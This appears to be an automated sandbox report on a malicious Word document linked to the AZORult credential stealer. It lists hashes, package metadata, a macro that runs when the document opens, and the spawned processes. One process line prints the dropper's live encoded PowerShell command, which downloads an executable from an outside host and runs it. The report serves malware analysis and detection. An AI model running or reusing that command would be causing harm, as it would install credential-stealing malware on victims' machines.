| File name: | Paymentslip.doc |
| Full analysis: | https://app.any.run/tasks/819730f4-5b70-4857-a057-48d2c55f3b33 |
| Verdict: | Malicious activity |
| Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
| Analysis date: | December 06, 2018, 01:09:19 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/xml |
| File info: | XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators |
| MD5: | BB8C9DB2445E7ECC4E4EEFC6ED1CB418 |
| SHA1: | A5E390676EE75888494C3150ED913BF70882E9C6 |
| SHA256: | FD24DE4D53E61EB7CD0C7B7B99552361DB2024B456568CB14ACCD6F59ADC3363 |
| SSDEEP: | 6144:+M516FgSNHUfWFqupSBUKTrOwl0hsXUEM9y:z6FgZWB0nOwl0hsXUEuy |
| .xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7) |
|---|---|---|
| .rels | | | Open Office XML Relationships (28.2) |
| .xml | | | Microsoft Office XML Flat File Format (ASCII) (20.8) |
| .svg | | | Scalable Vector Graphics (var.3) (4.5) |
| .xml | | | Generic XML (ASCII) (1.5) |
| PackagePartName: | /_rels/.rels |
|---|---|
| PackagePartContentType: | application/vnd.openxmlformats-package.relationships+xml |
| PackagePartPadding: | 512 |
| PackagePartXmlDataRelationshipsXmlns: | http://schemas.openxmlformats.org/package/2006/relationships |
| PackagePartXmlDataRelationshipsRelationshipId: | rId3 |
| PackagePartXmlDataRelationshipsRelationshipType: | http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties |
| PackagePartXmlDataRelationshipsRelationshipTarget: | docProps/app.xml |
| PackagePartXmlDataDocumentIgnorable: | w14 w15 wp14 |
| PackagePartXmlDataDocumentBodyPRsidR: | 002C3C24 |
| PackagePartXmlDataDocumentBodyPRsidRDefault: | 007D1537 |
| PackagePartXmlDataDocumentBodyPBookmarkStartId: | - |
| PackagePartXmlDataDocumentBodyPBookmarkStartName: | _GoBack |
| PackagePartXmlDataDocumentBodyPBookmarkEndId: | - |
| PackagePartXmlDataDocumentBodyPRRPrNoProof: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistB: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistL: | 114300 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDistR: | 114300 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePos: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorRelativeHeight: | 251658240 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorBehindDoc: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorLocked: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorLayoutInCell: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorAllowOverlap: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosX: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosY: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHRelativeFrom: | column |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHPosOffset: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVRelativeFrom: | paragraph |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVPosOffset: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCx: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCy: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentL: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentR: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentB: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorWrapNone: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrId: | 2 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrName: | Picture 2 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorCNvGraphicFramePr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataUri: | http://schemas.openxmlformats.org/drawingml/2006/picture |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrId: | 2 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrName: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPicPr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipEmbed: | rId5 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUri: | {28A0092B-C50C-407E-A947-70E740481C1C} |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillStretchFillRect: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffX: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffY: | - |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCx: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCy: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomPrst: | rect |
| PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomAvLst: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistB: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistL: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDistR: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName: | Picture 1 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri: | http://schemas.openxmlformats.org/drawingml/2006/picture |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId: | 1 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed: | rId5 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri: | {28A0092B-C50C-407E-A947-70E740481C1C} |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY: | - |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy: | 4649492 |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst: | rect |
| PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst: | - |
| PackagePartXmlDataDocumentBodySectPrRsidR: | 002C3C24 |
| PackagePartXmlDataDocumentBodySectPrPgSzW: | 12240 |
| PackagePartXmlDataDocumentBodySectPrPgSzH: | 15840 |
| PackagePartXmlDataDocumentBodySectPrPgMarTop: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarRight: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarBottom: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarLeft: | 1440 |
| PackagePartXmlDataDocumentBodySectPrPgMarHeader: | 720 |
| PackagePartXmlDataDocumentBodySectPrPgMarFooter: | 720 |
| PackagePartXmlDataDocumentBodySectPrPgMarGutter: | - |
| PackagePartXmlDataDocumentBodySectPrColsSpace: | 720 |
| PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: | 360 |
| PackagePartBinaryData: | (Binary data 130316 bytes, use -b option to extract) |
| PackagePartCompression: | store |
| PackagePartXmlDataThemeName: | Office Theme |
| PackagePartXmlDataThemeThemeElementsClrSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: | windowText |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: | 000000 |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: | window |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: | FFFFFF |
| PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: | 44546A |
| PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: | E7E6E6 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: | 5B9BD5 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: | ED7D31 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: | A5A5A5 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: | FFC000 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: | 4472C4 |
| PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: | 70AD47 |
| PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: | 0563C1 |
| PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: | 954F72 |
| PackagePartXmlDataThemeThemeElementsFontSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: | Calibri Light |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: | 020F0302020204030204 |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: | Jpan |
| PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: | MS ゴシック |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: | Calibri |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: | 020F0502020204030204 |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: | - |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: | Jpan |
| PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: | MS 明朝 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeName: | Office |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: | 1 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 110000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 105000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 67000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 100000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: | 6350 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: | flat |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: | sng |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: | ctr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: | solid |
| PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: | 800000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: | 57150 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: | 19050 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: | ctr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: | 000000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: | 63000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: | 95000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: | 170000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: | 1 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: | - |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 93000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 150000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 98000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 102000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: | 5400000 |
| PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: | - |
| PackagePartXmlDataThemeObjectDefaults: | - |
| PackagePartXmlDataThemeExtraClrSchemeLst: | - |
| PackagePartXmlDataThemeExtLstExtUri: | {05A4C25C-085E-4340-85A3-A5531E510DB2} |
| PackagePartXmlDataThemeExtLstExtThemeFamilyName: | Office Theme |
| PackagePartXmlDataThemeExtLstExtThemeFamilyId: | {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F} |
| PackagePartXmlDataThemeExtLstExtThemeFamilyVid: | {4A3C46E8-61CC-4603-A589-7422A47A8E4A} |
| PackagePartXmlDataVbaSuppDataIgnorable: | w14 w15 wp14 |
| PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: | - |
| PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: | PROJECT.KDDMFC.F_GRZSRQ5L9VLDBWYSHE |
| PackagePartXmlDataVbaSuppDataMcdsMcdName: | Project.KddmFc.f_GrZsRq5L9VLDbWySHE |
| PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: | 00 |
| PackagePartXmlDataVbaSuppDataMcdsMcdCmg: | 56 |
| PackagePartXmlDataSettingsIgnorable: | w14 w15 |
| PackagePartXmlDataSettingsZoomPercent: | 100 |
| PackagePartXmlDataSettingsDefaultTabStopVal: | 720 |
| PackagePartXmlDataSettingsCharacterSpacingControlVal: | doNotCompress |
| PackagePartXmlDataSettingsCompatCompatSettingName: | compatibilityMode |
| PackagePartXmlDataSettingsCompatCompatSettingUri: | http://schemas.microsoft.com/office/word |
| PackagePartXmlDataSettingsCompatCompatSettingVal: | 15 |
| PackagePartXmlDataSettingsRsidsRsidRootVal: | 007D1537 |
| PackagePartXmlDataSettingsRsidsRsidVal: | 002C3C24 |
| PackagePartXmlDataSettingsMathPrMathFontVal: | Cambria Math |
| PackagePartXmlDataSettingsMathPrBrkBinVal: | before |
| PackagePartXmlDataSettingsMathPrBrkBinSubVal: | -- |
| PackagePartXmlDataSettingsMathPrSmallFracVal: | - |
| PackagePartXmlDataSettingsMathPrDispDef: | - |
| PackagePartXmlDataSettingsMathPrLMarginVal: | - |
| PackagePartXmlDataSettingsMathPrRMarginVal: | - |
| PackagePartXmlDataSettingsMathPrDefJcVal: | centerGroup |
| PackagePartXmlDataSettingsMathPrWrapIndentVal: | 1440 |
| PackagePartXmlDataSettingsMathPrIntLimVal: | subSup |
| PackagePartXmlDataSettingsMathPrNaryLimVal: | undOvr |
| PackagePartXmlDataSettingsThemeFontLangVal: | en-US |
| PackagePartXmlDataSettingsClrSchemeMappingBg1: | light1 |
| PackagePartXmlDataSettingsClrSchemeMappingT1: | dark1 |
| PackagePartXmlDataSettingsClrSchemeMappingBg2: | light2 |
| PackagePartXmlDataSettingsClrSchemeMappingT2: | dark2 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent1: | accent1 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent2: | accent2 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent3: | accent3 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent4: | accent4 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent5: | accent5 |
| PackagePartXmlDataSettingsClrSchemeMappingAccent6: | accent6 |
| PackagePartXmlDataSettingsClrSchemeMappingHyperlink: | hyperlink |
| PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: | followedHyperlink |
| PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: | 1026 |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: | edit |
| PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: | 1 |
| PackagePartXmlDataSettingsDecimalSymbolVal: | . |
| PackagePartXmlDataSettingsListSeparatorVal: | , |
| PackagePartXmlDataSettingsChartTrackingRefBased: | - |
| PackagePartXmlDataSettingsDocIdVal: | {587BFEAE-043A-4C54-8D39-E3BC2D30D35D} |
| PackagePartXmlDataPropertiesXmlns: | http://schemas.openxmlformats.org/officeDocument/2006/extended-properties |
| PackagePartXmlDataPropertiesTemplate: | Normal |
| PackagePartXmlDataPropertiesTotalTime: | - |
| PackagePartXmlDataPropertiesPages: | 1 |
| PackagePartXmlDataPropertiesWords: | - |
| PackagePartXmlDataPropertiesCharacters: | 2 |
| PackagePartXmlDataPropertiesApplication: | Microsoft Office Word |
| PackagePartXmlDataPropertiesDocSecurity: | - |
| PackagePartXmlDataPropertiesLines: | 1 |
| PackagePartXmlDataPropertiesParagraphs: | 1 |
| PackagePartXmlDataPropertiesScaleCrop: | - |
| PackagePartXmlDataPropertiesCompany: | - |
| PackagePartXmlDataPropertiesLinksUpToDate: | - |
| PackagePartXmlDataPropertiesCharactersWithSpaces: | 2 |
| PackagePartXmlDataPropertiesSharedDoc: | - |
| PackagePartXmlDataPropertiesHyperlinksChanged: | - |
| PackagePartXmlDataPropertiesAppVersion: | 15 |
| PackagePartXmlDataStylesIgnorable: | w14 w15 |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: | minorHAnsi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: | minorBidi |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: | 22 |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: | 22 |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: | en-US |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: | en-US |
| PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: | ar-SA |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: | 160 |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: | 259 |
| PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: | auto |
| PackagePartXmlDataStylesLatentStylesDefLockedState: | - |
| PackagePartXmlDataStylesLatentStylesDefUIPriority: | 99 |
| PackagePartXmlDataStylesLatentStylesDefSemiHidden: | - |
| PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: | - |
| PackagePartXmlDataStylesLatentStylesDefQFormat: | - |
| PackagePartXmlDataStylesLatentStylesCount: | 371 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionName: | Normal |
| PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: | - |
| PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: | 1 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: | 1 |
| PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: | 1 |
| PackagePartXmlDataStylesStyleType: | paragraph |
| PackagePartXmlDataStylesStyleDefault: | 1 |
| PackagePartXmlDataStylesStyleStyleId: | Normal |
| PackagePartXmlDataStylesStyleNameVal: | Normal |
| PackagePartXmlDataStylesStyleQFormat: | - |
| PackagePartXmlDataStylesStyleUiPriorityVal: | 1 |
| PackagePartXmlDataStylesStyleSemiHidden: | - |
| PackagePartXmlDataStylesStyleUnhideWhenUsed: | - |
| PackagePartXmlDataStylesStyleTblPrTblIndW: | - |
| PackagePartXmlDataStylesStyleTblPrTblIndType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: | - |
| PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: | 108 |
| PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: | - |
| PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: | dxa |
| PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: | 108 |
| PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: | dxa |
| PackagePartXmlDataCorePropertiesTitle: | - |
| PackagePartXmlDataCorePropertiesSubject: | - |
| PackagePartXmlDataCorePropertiesCreator: | gtst1 |
| PackagePartXmlDataCorePropertiesKeywords: | - |
| PackagePartXmlDataCorePropertiesDescription: | - |
| PackagePartXmlDataCorePropertiesLastModifiedBy: | gtst1 |
| PackagePartXmlDataCorePropertiesRevision: | 1 |
| PackagePartXmlDataCorePropertiesCreatedType: | dcterms:W3CDTF |
| PackagePartXmlDataCorePropertiesCreated: | 2018:12:04 06:17:00Z |
| PackagePartXmlDataCorePropertiesModifiedType: | dcterms:W3CDTF |
| PackagePartXmlDataCorePropertiesModified: | 2018:12:04 06:17:00Z |
| PackagePartXmlDataFontsIgnorable: | w14 w15 |
| PackagePartXmlDataFontsFontName: | Calibri |
| PackagePartXmlDataFontsFontPanose1Val: | 020F0502020204030204 |
| PackagePartXmlDataFontsFontCharsetVal: | 00 |
| PackagePartXmlDataFontsFontFamilyVal: | swiss |
| PackagePartXmlDataFontsFontPitchVal: | variable |
| PackagePartXmlDataFontsFontSigUsb0: | E00002FF |
| PackagePartXmlDataFontsFontSigUsb1: | 4000ACFF |
| PackagePartXmlDataFontsFontSigUsb2: | 00000001 |
| PackagePartXmlDataFontsFontSigUsb3: | 00000000 |
| PackagePartXmlDataFontsFontSigCsb0: | 0000019F |
| PackagePartXmlDataFontsFontSigCsb1: | 00000000 |
| PackagePartXmlDataWebSettingsIgnorable: | w14 w15 |
| PackagePartXmlDataWebSettingsOptimizeForBrowser: | - |
| PackagePartXmlDataWebSettingsAllowPNG: | - |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2396 | "C:\Users\admin\Documents\WindowsUpdate.exe" | C:\Users\admin\Documents\WindowsUpdate.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2580 | "C:\Windows\System32\cmd.exe" /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHc